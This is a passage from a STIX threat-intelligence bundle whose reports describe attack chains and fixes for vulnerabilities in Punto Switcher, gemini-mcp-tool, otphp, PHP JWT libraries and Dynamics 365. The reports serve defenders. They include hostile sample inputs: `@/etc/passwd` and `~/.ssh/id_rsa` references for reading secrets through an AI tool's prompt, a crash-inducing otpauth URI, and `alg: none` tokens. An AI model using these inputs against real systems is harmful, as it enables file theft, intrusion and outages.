environment `PATH` variable.\n5.  **Execution Trigger:** The attacker waits for Punto Switcher to start or forces its execution, which causes Punto Switcher to attempt to call `RunDll32.exe`.\n6.  **Hijacked Execution:** Due to the unquoted search path vulnerability, the operating system's loader resolves `RunDll32.exe` to the attacker's malicious binary located earlier in the PATH, rather than the legitimate one in `C:\\Windows\\System32`.\n7.  **Arbitrary Code Execution:** The malicious `RunDll32.exe` is executed by Punto Switcher, allowing the attacker to run arbitrary code with the privileges of the affected user.\n8.  **Impact:** The attacker achieves local arbitrary code execution, enabling further actions like privilege escalation, data exfiltration, or system modification.\n\n## Impact\n\nThe successful exploitation of CVE-2026-25865 leads to local arbitrary code execution. This means an attacker, already having local access, can elevate their privileges or execute any code they choose on the affected system, potentially compromising the user's data and system integrity. Given the high CVSS base score of 7.8, the impact on confidentiality, integrity, and availability is considered high for the affected user's scope. This could lead to data theft, installation of additional malware, or complete system compromise within the user's context. There is no information available regarding specific victims or targeted sectors, but any Windows user running the vulnerable Punto Switcher software is at risk.\n\n## Recommendation\n\n*   **Patch CVE-2026-25865 immediately**: Update Yandex Punto Switcher to a version beyond 4.5.0.583 as soon as a patch is available from the vendor.\n*   **Deploy the Sigma rule \"Detects CVE-2026-25865 Exploitation - Malicious RunDll32.exe by Punto Switcher\" to your SIEM**: Monitor for Punto Switcher processes launching `RunDll32.exe` from non-standard system paths.\n*   **Deploy the Sigma rule \"Detects Unsigned RunDll32.exe Executing from Suspicious Paths\" to your SIEM**: Monitor for `RunDll32.exe` executing from non-standard paths, especially if the binary is unsigned, as a general defense against path interception.\n*   **Enable Sysmon process-creation logging**: Ensure detailed logging for `process_creation` events, including `Image`, `CommandLine`, `ParentImage`, and `Hashes` fields, to activate the rules above.\n*   **Review system PATH environment variables**: Regularly audit system and user `PATH` variables for inclusion of non-standard, user-writable directories before system directories like `C:\\Windows\\System32`.\n",
      "published": "2026-06-18T20:24:29Z",
      "labels": [
        "privilege-escalation",
        "local-exploitation",
        "windows",
        "software-vulnerability",
        "path-interception"
      ],
      "object_refs": [
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25865"
        },
        {
          "source_name": "reference",
          "url": "https://spektion.com/articles/cve-2026-25865-punto-switcher"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/punto-switcher-unquoted-search-path-via-winexec"
        },
        {
          "source_name": "reference",
          "url": "https://yandex.ru/soft/punto"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--df5fb332-5d33-5239-9e6e-f620062aaac6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7bcad696-0317-5fbe-b5b5-ec2db250e30e",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a74513f-19f5-5955-87ae-20a152a3d346",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7bcad696-0317-5fbe-b5b5-ec2db250e30e",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fe86ede3-8529-5b9e-9ced-9da49eccd951",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7bcad696-0317-5fbe-b5b5-ec2db250e30e",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7bcad696-0317-5fbe-b5b5-ec2db250e30e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "gemini-mcp-tool Vulnerable to OS Command Injection and File Exfiltration (CVE-2026-0755)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-0755, exists in versions 1.1.2 through 1.1.5 of the npm package `gemini-mcp-tool`. This flaw allows an attacker to achieve OS command injection on Windows systems by exploiting improper handling of unquoted `cmd.exe` metacharacters when the tool processes untrusted prompt input. Simultaneously, the tool's `@file` parser can be abused to read and exfiltrate arbitrary local files from the host system, including sensitive configuration files like `/etc/passwd` or private keys such as `~/.ssh/id_rsa`. The vulnerability stems from insufficient sanitization and quoting of user-supplied prompt data before it is processed by the tool or passed to the underlying operating system. This could lead to full system compromise or extensive data theft, affecting organizations utilizing this specific CLI tool in their development or operational workflows. The issue was addressed in version 1.1.6, which includes hardened Windows `cmd.exe` argument quoting and restricts `@file` references to the working directory.\n\n## Attack Chain\n\n1.  **Attacker Crafts Malicious Prompt**: An attacker creates a specially crafted prompt input containing `cmd.exe` metacharacters (e.g., `\u0026`, `|`, `\u0026\u0026`) for OS command injection or `@file` references (e.g., `@/etc/passwd`) for file exfiltration.\n2.  **User Executes Vulnerable Tool**: The `gemini-mcp-tool` (versions 1.1.2 to 1.1.5), often run via `node.exe` as an npm package, is executed with the attacker-controlled malicious prompt as an argument.\n3.  **Improper Argument Handling (Windows)**: On Windows systems, the vulnerable tool processes the prompt without adequately quoting the `cmd.exe` metacharacters, leading to them being interpreted as separate commands when passed to the underlying shell.\n4.  **OS Command Injection**: The `gemini-mcp-tool` or its child process (e.g., `node.exe` spawning `cmd.exe`) executes the injected OS commands, allowing the attacker to run arbitrary commands on the system with the privileges of the tool.\n5.  **Sensitive File Access (File Exfiltration)**: Alternatively, if the prompt includes `@file` references to sensitive paths (e.g., `@C:\\Windows\\System32\\drivers\\etc\\hosts` or `@/etc/passwd`), the `gemini-mcp-tool`'s internal parser will attempt to read these files from the local filesystem, bypassing intended directory restrictions.\n6.  **Data Exfiltration / Remote Code Execution**: The content of the accessed sensitive files can be retrieved or exfiltrated by the attacker, or the successful command injection grants the attacker remote code execution capabilities, enabling further compromise, persistence, or data theft.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-0755 allows for critical impact, including full system compromise through remote code execution on affected Windows systems. Attackers can execute arbitrary commands, install malware, create new user accounts, or modify system configurations. Furthermore, the ability to exfiltrate arbitrary local files poses a severe risk of sensitive data exposure, including credentials, private keys, intellectual property, and internal system configurations. This could lead to significant financial losses, reputational damage, and regulatory penalties. The nature of the package suggests potential impact across development environments, CI/CD pipelines, or systems where this CLI tool is used for Gemini-related operations.\n\n## Recommendation\n\n*   **Patch CVE-2026-0755 immediately** by upgrading `gemini-mcp-tool` to version 1.1.6 or higher to address both OS command injection and file exfiltration vulnerabilities.\n*   **Enable Sysmon process_creation logging** on all Windows endpoints and servers to activate the rules provided in this brief.\n*   **Deploy the Sigma rules in this brief** to your SIEM and tune for your environment to detect suspicious command execution patterns involving `node.exe` or `cmd.exe` and attempts to read sensitive files.\n*   **Implement strict input validation** for any applications or scripts that pass user-controlled input directly to the `gemini-mcp-tool` CLI.\n",
      "published": "2026-06-18T20:49:02Z",
      "labels": [
        "command-injection",
        "file-exfiltration",
        "npm",
        "cli-tool",
        "web-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-4h5r-5jm8-jxjm"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7dc58fec-2090-5652-a4e0-0e9a41cac8d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--26737b9f-3e8a-52cc-9f83-88719caa48c3",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--26737b9f-3e8a-52cc-9f83-88719caa48c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "spomky-labs/otphp Unbounded Digits Parameter Leads to Denial of Service",
      "description": "## Overview\n\nThe `spomky-labs/otphp` library, versions prior to 11.4.3, is affected by a high-severity denial-of-service vulnerability (GHSA-g7m4-839x-ch6v) concerning its handling of OTP provisioning URIs. This vulnerability, disclosed in June 2026, arises when the `digits` parameter within an `otpauth` URI is provided with an excessively large value (typically 40 or greater). The library's internal validation for this parameter only checks for a lower bound, lacking an upper bound. During OTP generation or verification, the calculation `10 ** digits` overflows PHP's integer capacity on 64-bit systems, resulting in an implicit cast to `0`. A subsequent modulo operation with this zero value triggers a `DivisionByZeroError`. Critically, this error extends PHP's `Error` class rather than `Exception`, meaning it bypasses typical `try-catch (\\Exception)` blocks, leading to unhandled fatal errors and effectively causing a denial of service for any application component attempting to process the malformed OTP object.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious `otpauth` provisioning URI containing an unusually large `digits` parameter, for example, `otpauth://totp/Alice?secret=JBSWY3DPEHPK3PXP\u0026digits=50`.\n2.  A vulnerable PHP application, utilizing `spomky-labs/otphp` (versions prior to 11.4.3), processes this URI, for instance, by calling `OTPHP\\Factory::loadFromProvisioningUri()`.\n3.  The `loadFromProvisioningUri()` function internalizes the attacker-controlled `digits` parameter, which bypasses validation due to the lack of an upper bound check.\n4.  Later, the application attempts to generate or verify an OTP by invoking methods like `at()`, `now()`, or `verify()` on the `OTPHP\\OTP` object created from the malicious URI.\n5.  During the OTP calculation within `src/OTP.php:283`, the expression `10 ** $this-\u003egetDigits()` is evaluated using the excessively large `digits` value.\n6.  On 64-bit PHP 8.x, for `digits` values around 40 or higher, the exponentiation `10 ** digits` results in an integer overflow, causing PHP to implicitly cast the result to `0`.\n7.  A subsequent modulo operation, `($code % 0)`, attempts to divide by zero, which triggers a `DivisionByZeroError`.\n8.  As `DivisionByZeroError` is a PHP `Error` (not an `Exception`), it typically bypasses standard error handling, leading to an unhandled fatal error and causing a denial of service for the affected application component.\n\n## Impact\n\nThe vulnerability can lead to an application-level denial of service. When an application attempts to process a maliciously crafted `otpauth` URI, the internal `DivisionByZeroError` leads to an unhandled fatal error, effectively crashing the OTP generation or verification process. This means that users might be unable to log in, perform multi-factor authentication, or complete any transaction relying on OTPs, rendering the affected service partially or fully unavailable. While no specific victim counts are provided, any PHP application utilizing the vulnerable `spomky-labs/otphp` library for OTP functionality could be impacted.\n\n## Recommendation\n\n*   Upgrade the `spomky-labs/otphp` library to version 11.4.3 or newer immediately to mitigate the vulnerability (GHSA-g7m4-839x-ch6v).\n*   Deploy the Sigma rule \"Detect GHSA-g7m4-839x-ch6v OTPHPH Vulnerability Exploitation Attempt\" to your web application firewall (WAF) or intrusion detection system (IDS) to block web requests containing suspicious `otpauth` URIs with large `digits` parameters.\n*   Implement the Sigma rule \"Detect Potential OTP Application Denial of Service (HTTP 5xx Response)\" and tune it for high-volume HTTP 5xx responses on OTP-related endpoints as a general indicator of potential DoS.\n*   Enable comprehensive application logging for PHP errors and monitor for `DivisionByZeroError` messages, particularly those originating from `spomky-labs/otphp` components.\n",
      "published": "2026-06-18T20:54:10Z",
      "labels": [
        "php",
        "denial-of-service",
        "vulnerability",
        "ghsa"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-g7m4-839x-ch6v"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7764202f-3a0f-50f6-9c44-86ef4c30b041",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f282d081-f8bd-5c16-b2a0-236a2465124e",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Credential Access",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1213",
          "url": "https://attack.mitre.org/techniques/T1213"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6d6ff262-a26e-5768-a9db-e6ad2aa1015c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f282d081-f8bd-5c16-b2a0-236a2465124e",
      "target_ref": "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f282d081-f8bd-5c16-b2a0-236a2465124e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "PHP JWT Framework Algorithm Confusion Vulnerability (TOCTOU)",
      "description": "## Overview\n\nThe `web-token/jwt-framework` and `web-token/jwt-library` PHP packages are affected by a Time-of-Check/Time-of-Use (TOCTOU) vulnerability that allows attackers to perform algorithm confusion attacks. Specifically, in `JWSVerifier::getAlgorithm()` and `JWEDecrypter`, header merging logic (`...` spread operator or `array_merge()`) incorrectly prioritizes the unprotected `alg` (algorithm) parameter over the integrity-protected one when duplicate keys exist. This means that while the protected header's `alg` might be validated (e.g., `RS256`), the actual signature verification or decryption might proceed with an attacker-specified `alg` from the unprotected header (e.g., `HS256` or `none`). This bypasses cryptographic integrity checks, enabling authentication bypass, unauthorized access, or information disclosure, making it critical for applications relying on these libraries for secure JWT handling.\n\n## Attack Chain\n\n1.  **Initial Access / Reconnaissance:** An attacker identifies a web application utilizing JSON Web Tokens (JWTs) for authentication or authorization.\n2.  **Malicious JWT Creation:** The attacker crafts a JWT containing a protected header with a strong, integrity-protected algorithm (e.g., `alg: RS256`) and an unprotected header specifying a weaker or symmetric algorithm (e.g., `alg: HS256` or `alg: none`), intending for the unprotected `alg` to override the protected one.\n3.  **Token Submission:** The attacker sends this crafted, malicious JWT to the vulnerable web application, typically within an HTTP `Authorization` header or as a cookie.\n4.  **Header Merging (TOCTOU):** Upon receiving the JWT, the application's `JWSVerifier` or `JWEDecrypter` component merges the protected and unprotected headers. Due to the vulnerability, the `alg` parameter from the unprotected header overwrites the `alg` from the protected header in the internal merged array.\n5.  **Algorithm Validation (Time-of-Check):** An initial check (e.g., by `HeaderCheckerManager`) might validate the `alg` from the *protected* header (e.g., `RS256`), which passes, creating a false sense of security.\n6.  **Signature/Decryption (Time-of-Use):** The `JWSVerifier` or `JWEDecrypter` proceeds to verify the JWT signature (or decrypt the payload) using the `alg` parameter that was *overridden* by the unprotected header (e.g., `HS256` or `none`).\n7.  **Authentication Bypass / Data Compromise:** If the attacker chose an `alg` like `none` or could forge a valid signature for a symmetric key (`HS256`), the system may successfully validate the JWT.\n8.  **Impact:** This leads to unauthorized access, impersonation of legitimate users, or decryption of sensitive data, allowing the attacker to bypass authentication mechanisms.\n\n## Impact\n\nIf exploited, this vulnerability leads to a severe authentication bypass, allowing attackers to forge valid JSON Web Tokens (JWTs) and gain unauthorized access to web applications. This could result in full account takeover, privilege escalation, and access to sensitive data or functionality that should be restricted. The impact is significant for applications that rely on `web-token/jwt-framework` or `web-token/jwt-library` for secure session management, API authentication, or inter-service communication. Organizations across all sectors using PHP applications with these specific JWT libraries are at risk, as the integrity of their authentication and authorization mechanisms is compromised.\n\n## Recommendation\n\n*   Immediately update `composer/web-token/jwt-framework` to a patched version (e.g., newer than 4.2.99) to address the algorithm confusion vulnerability.\n*   Immediately update `composer/web-token/jwt-library` to a patched version (e.g., \u003e= 3.4.10, \u003e= 4.0.7, \u003e= 4.1.7) to address the algorithm confusion vulnerability.\n*   Review application logs for entries indicating JWT verification failures or unexpected algorithm usage for authentication (refer to the `Detect JWT Algorithm Verification Errors` rule).\n*   Ensure verbose application logging is enabled for JWT processing and verification steps to aid in detection of anomalous `alg` parameter usage (refer to the `Detect JWT 'none' Algorithm Usage` rule).\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment, specifically for `webserver` logs that might contain application-level JWT processing details.\n",
      "published": "2026-06-18T21:14:03Z",
      "labels": [
        "vulnerability",
        "php",
        "jwt",
        "web",
        "authentication-bypass"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--429a6830-d83b-5acb-a98c-8015a8ae6a71"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-jc38-x7x8-2xc8"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--280da0a0-823e-5a53-852c-44d294696715",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a6803f16-bc93-54cd-b5d6-67ae2851537b",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a6803f16-bc93-54cd-b5d6-67ae2851537b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "PHP JWT Library PBES2-HS*+A*KW Unbounded p2c Iteration Count Leads to DoS",
      "description": "## Overview\n\nA high-severity denial-of-service vulnerability (CWE-400) has been discovered in the PHP JWT Library (composer/web-token/jwt-library and jwt-framework), affecting versions prior to 3.4.10, 4.0.7, and 4.1.7. This flaw allows an unauthenticated attacker to trigger an unbounded CPU consumption on a server processing JSON Web Encryption (JWE) tokens. Specifically, when JWEs utilize password-based key-encryption algorithms (PBES2-HS256+A128KW, PBES2-HS384+A192KW, PBES2-HS512+A256KW), the `PBES2AESKW::unwrapKey()` function reads the `p2c` (PBKDF2 iteration count) parameter directly from the attacker-controlled JOSE header. The absence of an upper bound on this parameter allows attackers to specify extremely high iteration counts (e.g., 100,000,000 or PHP_INT_MAX), causing the server to expend significant CPU resources on PBKDF2 computations before any key unwrapping validation occurs. This resource exhaustion can lead to severe service degradation or unavailability for targeted applications.\n\n## Attack Chain\n\n1.  An unauthenticated attacker crafts a malicious JSON Web Encryption (JWE) token.\n2.  The attacker manipulates the protected JOSE header of the JWE to include a `p2c` (PBKDF2 iteration count) parameter with an arbitrarily large integer value (e.g., `100,000,000` or `PHP_INT_MAX`).\n3.  The attacker sends this crafted JWE token to a vulnerable application endpoint (e.g., via an HTTP header, request body, or URL parameter).\n4.  The vulnerable PHP JWT Library receives the JWE and attempts to process it using a registered PBES2-HS*+A*KW algorithm for key unwrapping.\n5.  The `PBES2AESKW::unwrapKey()` function extracts the `p2c` value from the JOSE header without adequate upper bound validation, as only `is_int($p2c) \u0026\u0026 $p2c \u003e 0` is checked.\n6.  The function initiates `hash_pbkdf2()` with the excessively large `p2c` value, forcing the server's CPU to perform an intensive, prolonged computation for PBKDF2 key derivation.\n7.  The server worker process becomes stalled, consuming significant CPU resources for an extended period (potentially tens of seconds per request), leading to resource exhaustion.\n8.  If sufficient malicious JWEs are processed, the application or server becomes unresponsive, resulting in a denial-of-service condition due to uncontrolled resource consumption.\n\n## Impact\n\nSuccessful exploitation of this vulnerability leads to a severe denial-of-service (DoS) condition. Attackers can force target servers to dedicate substantial CPU resources to perform computationally expensive PBKDF2 iterations, effectively stalling worker processes. This resource exhaustion prevents legitimate users from accessing the application, resulting in service unavailability and potential data loss if stateful operations are interrupted. While the vulnerability description does not specify observed victim counts or sectors, any application utilizing the affected PHP JWT Library and configured to accept JWEs with PBES2 algorithms is at risk, particularly those exposed to unauthenticated input. The cost to the attacker for generating the malicious JWE is negligible compared to the server's computational burden.\n\n## Recommendation\n\n*   Upgrade the `composer/web-token/jwt-library` to versions 3.4.10, 4.0.7, or 4.1.7, or `composer/web-token/jwt-framework` to version 4.1.7 or later, which enforce a `DEFAULT_MAX_COUNT = 1_000_000` for `p2c`.\n*   If immediate upgrade is not feasible, implement a custom header checker to validate and limit the `p2c` header parameter for JWEs before they are processed by the vulnerable library, as described in the source.\n*   Disable PBES2 algorithms for JWE decryption if they are not strictly required, especially for tokens originating from untrusted sources.\n*   Deploy the provided Sigma rules to your SIEM to detect attempts to exploit this vulnerability or identify applications configured to use the affected PBES2 algorithms.\n*   Monitor web server and PHP application logs for HTTP requests containing JWEs that use PBES2 algorithms or include abnormally large `p2c` values, as described in the detection rules.\n",
      "published": "2026-06-18T21:15:29Z",
      "labels": [
        "denial-of-service",
        "web",
        "php",
        "jwt",
        "jwe",
        "cwe-400"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-3prj-6hqw-cm82"
        },
        {
          "source_name": "reference",
          "url": "https://www.rfc-editor.org/rfc/rfc7518#section-4.8"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/400.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--857631ef-90e8-5914-b210-ab5a7432614c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--48683172-f406-54e2-b405-0260ddb6923b",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--48683172-f406-54e2-b405-0260ddb6923b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-47647: Critical Privilege Escalation in Microsoft Dynamics 365",
      "description": "## Overview\n\nA critical improper access control vulnerability, identified as CVE-2026-47647, has been reported in Microsoft Dynamics 365. This flaw permits an already authorized attacker to elevate their privileges across the network, gaining access beyond their intended permissions. The vulnerability stems from insufficient validation of user authorization levels when accessing certain functionalities or data within the Dynamics 365 environment. With a CVSS 3.1 Base Score of 9.9 (CRITICAL), successful exploitation could grant an attacker full administrative control, allowing them to view, modify, or delete sensitive data, disrupt business operations, or establish further persistence within the organization's network. This vulnerability affects core deployments of Microsoft Dynamics 365 and requires immediate attention from system administrators.\n\n## Attack Chain\n\n1.  **Initial Access (Authorized):** An attacker gains initial authorized access to the Microsoft Dynamics 365 environment using valid, but lower-privileged, user credentials. This typically involves standard login procedures.\n2.  **Vulnerability Identification:** The attacker identifies specific application endpoints, API functions, or data objects within Dynamics 365 that are susceptible to improper access control due to CVE-2026-47647.\n3.  **Crafting Malicious Network Request:** The attacker crafts a specially designed HTTP request (e.g., POST, PUT, or PATCH) targeting the identified vulnerable component, incorporating parameters or headers intended for higher-privileged operations.\n4.  **Access Control Bypass:** Due to the improper access control vulnerability (CVE-2026-47647), the Dynamics 365 application fails to enforce the correct authorization checks for the attacker's current privilege level against the requested action.\n5.  **Execution of Privileged Action:** The application processes and executes the attacker's request, inadvertently performing an operation with elevated privileges that should have been restricted.\n6.  **Privilege Escalation Achieved:** The attacker successfully gains higher-level access, such as administrative rights, or performs actions typically reserved for users with elevated roles within the Microsoft Dynamics 365 environment.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-47647 grants an authorized attacker elevated privileges within Microsoft Dynamics 365. This can lead to severe consequences, including unauthorized access to sensitive business data, customer records, financial information, and intellectual property. Attackers could manipulate critical business processes, create or delete user accounts, tamper with system configurations, or introduce further malicious payloads, potentially resulting in data breaches, regulatory non-compliance, significant financial losses, and reputational damage. The lack of proper authorization checks means that the attacker can potentially achieve full administrative control over the Dynamics 365 instance.\n\n## Recommendation\n\n*   Prioritize and apply the security updates provided by Microsoft for CVE-2026-47647 on all affected Microsoft Dynamics 365 installations immediately.\n*   Deploy the provided Sigma rules to your SIEM solution to detect potential exploitation attempts and suspicious activities related to privilege escalation in your Microsoft Dynamics 365 environment.\n*   Enable comprehensive web server logging for your Dynamics 365 instance, focusing on capturing full HTTP request details, including URI stems, query parameters, and methods, as referenced in the Sigma rules.\n*   Regularly review logs for unusual access patterns, attempts to access administrative interfaces by non-administrative accounts, and HTTP requests that match patterns in the provided Sigma rules.\n",
      "published": "2026-06-18T22:20:38Z",
      "labels": [
        "privilege-escalation",
        "vulnerability",
        "microsoft",
        "dynamics365",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47647"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47647"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7280f0f1-93c4-59fc-9d37-62b03bf5141f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qwgj-rrpj-75xm",
      "pattern": "[url:value = 'https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qwgj-rrpj-75xm']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T23:26:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26b819e8-b4db-5378-803f-ccea864a2dc1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0e022061-f866-5d1a-b27b-ebf2ccc57dfe",
      "target_ref": "indicator--7280f0f1-93c4-59fc-9d37-62b03bf5141f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--3d7d8539-1b5d-57e0-89fb-7162bb4812a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://www.vulncheck.com/advisories/praisonai-arbitrary-shell-command-execution-via-hardcoded-approval-mode-override",
      "pattern": "[url:value = 'https://www.vulncheck.com/advisories/praisonai-arbitrary-shell-command-execution-via-hardcoded-approval-mode-override']",
      "pattern_type": "stix",
      "valid_from": "2026-06-18T23:26:52Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9e634b7f-275c-5eff-bba7-11ef8c0b82bd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0e022061-f866-5d1a-b27b-ebf2ccc57dfe",
      "target_ref": "indicator--3d7d8539-1b5d-57e0-89fb-7162bb4812a8"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
